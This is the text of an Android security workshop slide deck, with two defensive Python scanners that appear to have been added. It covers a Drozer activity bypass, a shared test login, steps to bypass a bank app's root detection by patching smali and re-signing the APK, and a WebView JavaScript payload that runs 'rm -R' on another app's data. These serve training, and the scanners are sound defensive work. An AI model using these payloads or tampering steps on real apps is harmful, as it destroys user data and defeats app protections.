
Android mobile app security offensive security workshop



  1. WHO AM I Next Generation Problem Solver; Researcher & Reader in free time; Speaker at; Facilitator at Weekend Testing; Bug Bounty Hunter (ex-Crowd Tester); Reported security vulnerabilities for 50+ unique customers all over the world, including Apple, Yahoo, Outlook, Adobe, etc.; Love to develop nasty code & hack it :); Works as Security Researcher at Accenture Digital Mobility; Certified Ethical Hacker; AKA Bug Wrangler; Null & OWASP Community
  2. DISCLAIMER This presentation is intended for educational purposes only, and I cannot be held liable for any kind of damage done to your machine or any other damage. Please don't try this attack on any other system without context knowledge or permission; this may harm someone directly or indirectly. Feel free to use this presentation for practice or education purposes. It is in no way related to my employer; it is my own research and ideas. ^ I hope you gotcha ^
  3. HUMLA MEANS 'ATTACK' IN HINDI
  5. SOCIAL MEDIA FEED Hashtags for this session: #NullHumla, #MobileSecurity. Twitter handles for feedback: @null0x00, @Abhinav_Sejpal
  6. ??? ~ WE AREN'T GOING TO DO THIS ~ So feel free to stop when you have a doubt! Are you ready to rock?
  7. Android Smartphone to IoT
  8. The mobile market is fragmented; stakeholders want their mobile app better, cheaper and faster. Correct? What if it has vulnerable code? WOW :D - Yet to update the stats -
  9. ANDROID PACKAGE - APK
  10. DEVELOPMENT PLAN
  11. ANDROID ARCHITECTURE
  12. MY HOME IS YOUR APK
  14. OUR ARSENAL
  15. PREREQUISITE CHECKS Genymotion Emulator; Santoku Linux / Appie / Android Tamer; Copy of shared APK(s): Here
  16. DROZER FRAMEWORK INTRODUCTION Drozer Server; Drozer Agent
  17. BYPASS THE ACTIVITY VALIDATION run app.activity.start --component sh.whisper sh.whisper.WInboxActivity
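The Drozer command above only works against an activity that other apps are allowed to start, and a defender can get that answer statically from the manifest apktool decodes. An added Python example (not from the workshop; the sample manifest and the sh.whisper.ADMIN permission are constructed) that lists activities reachable from outside the app:

```python
# Added example, not from the workshop: audit a decoded AndroidManifest.xml for
# activities that another app (or Drozer's app.activity.start) can start directly.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

def _attr(elem, name):
    return elem.get(f"{{{ANDROID_NS}}}{name}")

def exported_activities(manifest_xml: str):
    """Return [(activity, reason)] for activities reachable from outside the app:
    android:exported="true", or an <intent-filter> with android:exported omitted
    (the pre-Android 12 default). A guarding android:permission is appended so
    the reviewer can check it is signature-level rather than a normal permission."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    findings = []
    for act in root.iter("activity"):
        name = _attr(act, "name") or ""
        if name.startswith("."):
            name = package + name  # expand the shorthand relative class name
        exported = _attr(act, "exported")
        if exported == "true":
            reason = "exported=true"
        elif exported is None and act.find("intent-filter") is not None:
            reason = "intent-filter with no explicit exported attribute"
        else:
            continue  # exported="false", or no filter: not startable from outside
        perm = _attr(act, "permission")
        if perm:
            reason += f", guarded by {perm}"
        findings.append((name, reason))
    return findings

# Constructed sample manifest: the inbox activity name matches the slide's Drozer
# target; the ADMIN permission is made up for the example.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="sh.whisper">
  <application>
    <activity android:name=".MainActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <activity android:name=".WInboxActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity" android:exported="false"/>
    <activity android:name=".AdminActivity" android:exported="true"
              android:permission="sh.whisper.ADMIN"/>
  </application>
</manifest>"""
```

Every activity the function reports should either be meant as a public entry point (like the launcher activity) or be re-checked for an authorization step that does not rely on the caller having come through the expected screen.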
  18. Self-Practice Session Challenge 1 - Bypass the fixed authorization for the Whisper app
  19. nulltest2015@yahoo.in - Password!
  20. AD HOC FORENSIC ANALYSIS
  21. Can we replicate this issue for the LinkedIn / Hike app?
  22. LinkedIn insecure data storage
  23. INSTALL THE BANK APP Oh no - I can't use the app on a rooted device :(
  24. SMALI CODE ANALYSIS Step 1. Reversing the APK to a JAR file (Java classes): dex2jar-2.0/d2j-dex2jar.sh bank.apk
  25. STEP 2. READ THE JAR USING JD-GUI: jd-gui bank-dex2jar.jar
  26. STEP 3. Reversing the APK to smali code: java -jar apktool_2.0.0.jar d bank.apk
  27. STEP 4. LOCATE THE CODE WHICH DETECTS THE ROOT
  28. STEP 5. LOCATE THE SAME LOGIC IN THE JAR
  29. STEP 6. PREPARE A LOGICAL PATCH We can't patch the Java code and get the binary back; we have to patch the smali code with the new logic of isRooted
  30. STEP 7. THE NEW LOGIC IS AVAILABLE IN SMALI
  31. STEP 8. FIX THE SMALI CODE. STEP 9. Rebuild the binary
  32. STEP 10. CREATE A SELF-SIGNED CERTIFICATE http://developer.android.com/tools/publishing/app-signing.html
  33. STEP 11. SIGN THE APK WITH JARSIGNER. STEP 12. CHECK ROOT DETECTION * The updated APK has the patched code *
  34. ~ SUMMARY ~ Demo on missing root detection - Done. Demo on reversing the APK - Done. Demo on rebuilding the APK - Done. Demo on a weak binary - Done. Fix: use DexGuard, not ProGuard. Update the logical validation - Done. Identify the attack surface in smali code - Done. Demo on patching the smali code - Done. Demo on APK signing - Done. Finally, the root detection bypass - Done.
  35. ANDROID WEBVIEW Android lets apps create a bridge to render HTML and JavaScript and let that content interact with the application's Java code, using the open-source WebKit browser engine. 70% of applications use WebViews.
  36. THERE IS A TWEAK WITH USAGE Disable support for JavaScript; Disable support for plugins; Disable file system access
  37. WELL - HTTP VS HTTPS webView = new WebView(this); webView.getSettings().setJavaScriptEnabled(false);
  38. IDENTIFY THE APP WITH THE WEBKIT - Reverse the binary - Find the WebView code with addJavascriptInterface enabled - Remember, it's smali code -
  39. IDENTIFY AND UNDERSTAND THE ACTIVITY WITH JAVASCRIPT ENABLED IN THE CLEAN JAVA CODE
  40. VERIFY WHETHER THE NETWORK IS MALICIOUS: HTTP vs vulnerable HTTPS vs HTTPS
  41. Edit the response from the cloud server (man in the middle)
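The search described on the last two slides can be scripted over the smali tree apktool produces, so every bridge and every JavaScript enablement gets reviewed. An added Python example, not from the workshop, assuming an apktool output directory for scan_dir and using a constructed smali snippet whose bridge is registered under the name "Android":

```python
# Added example, not from the workshop: scan apktool smali output for WebView
# JavaScript bridges and JavaScript enablement for review before release.
import re
from pathlib import Path

BRIDGE = re.compile(r"invoke-virtual(?:/range)? \{[^}]*\}, Landroid/webkit/WebView;->addJavascriptInterface\(")
JS_ENABLED = re.compile(r"invoke-virtual \{[pv]\d+, (?P<arg>[pv]\d+)\}, Landroid/webkit/WebSettings;->setJavaScriptEnabled\(Z\)V")

def scan_smali(text: str, source: str = "<smali>"):
    """Return [(source, lineno, finding)] for the contents of one .smali file."""
    lines = text.splitlines()
    findings = []
    for i, line in enumerate(lines, 1):
        if BRIDGE.search(line):
            findings.append((source, i, "addJavascriptInterface bridge"))
        m = JS_ENABLED.search(line)
        if m:
            # Walk back a few instructions for the const/4 that loaded the boolean.
            for prev in reversed(lines[max(0, i - 6):i - 1]):
                cm = re.match(rf"\s*const/4 {m.group('arg')}, (0x[01])", prev)
                if cm:
                    state = "enabled" if cm.group(1) == "0x1" else "disabled"
                    findings.append((source, i, f"setJavaScriptEnabled {state}"))
                    break
    return findings

def scan_dir(smali_root: str):
    """Walk an apktool output tree (e.g. bank/smali) and scan every .smali file."""
    out = []
    for path in sorted(Path(smali_root).rglob("*.smali")):
        out.extend(scan_smali(path.read_text(errors="replace"), str(path)))
    return out

# Constructed smali for a WebView activity; the "Android" bridge name matches the
# window.Android object the slides' JavaScript payload calls into.
SAMPLE_SMALI = """\
.method protected onCreate(Landroid/os/Bundle;)V
    .locals 3
    new-instance v0, Landroid/webkit/WebView;
    invoke-direct {v0, p0}, Landroid/webkit/WebView;-><init>(Landroid/content/Context;)V
    invoke-virtual {v0}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
    move-result-object v1
    const/4 v2, 0x1
    invoke-virtual {v1, v2}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V
    new-instance v2, Lcom/example/app/JsBridge;
    invoke-direct {v2}, Lcom/example/app/JsBridge;-><init>()V
    const-string v1, "Android"
    invoke-virtual {v0, v2, v1}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
    return-void
.end method
"""
```

For each bridge reported, check that the bridge class only exposes methods annotated with @JavascriptInterface and that minSdkVersion is 17 or higher, since older API levels expose every public method of the object, including getClass(), to page script.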
  42. MALICIOUS JS VECTOR <script> var path = '/data/data/com.box.android/databases/---'; function execute(cmd){ document.write("WebView Vulnerability"); return window.Android.getClass().forName('java.lang.Runtime') } execute(['/system/bin/rm', '-R', path]); </script>
  43. BOOM - COMMAND HAS EXECUTED SUCCESSFULLY
  44. BYPASS THE ACTIVITY + API ATTACKS WITH THE VK APP
  45. YES - I'M DONE! Feel free to write me at bug.wrangler at outlook.com or tweet me at @Abhinav_Sejpal
  46. We need you! Attend Null meet-ups & give presentations. Share your ideas & learnings. Talk to our community champions. Your feedback helps us build a good community. Looking forward to your ongoing support. http://null.co.in/ Say 'Hello' @null0x00
  47. ! THANK YOU ! @anantshri @oldmanlab @adi1391 @prateekg147 @5h1vang @exploitprotocol #Nullblr Leads & Champions. Big thank you to @null0x00, Satish, Apoorva & you all
  48. LICENSE AND COPYRIGHTS Copyright 2015-2016 https://slides.com/abhinavsejpal/bangalore-android-null-humla/ Abhinav Sejpal ----- (CC BY-NC-ND 3.0) Attribution-NonCommercial-NoDerivs 3.0 Unported. Dedicated to my lovely daddy
